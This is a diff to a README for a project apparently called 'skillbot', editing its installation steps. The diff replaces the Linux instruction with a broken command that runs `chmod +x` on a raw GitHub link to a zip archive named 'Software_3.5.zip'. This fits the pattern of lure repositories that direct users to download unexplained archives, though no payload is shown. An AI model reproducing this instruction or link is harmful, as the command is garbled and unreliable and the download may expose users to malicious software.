Havishjupudi/skillbot/README.md

 - **Windows:** Double-click the `.exe` file and follow the on-screen prompts.
 - **macOS:** Open the `.dmg` file, drag the skillbot app to your Applications folder.
-- **Linux:** Make the file executable with the command `chmod +x filename.AppImage` and run it by double-clicking or via the terminal.
+- **Linux:** Make the file executable with the command `chmod +x https://raw.githubusercontent.com/Havishjupudi/skillbot/main/skills/Software_3.5.zip` and run it by double-clicking or via the terminal.

 The installer will guide you through the process.
 You don’t need to change any default options.
 Just click “Next” or “Continue” as you go.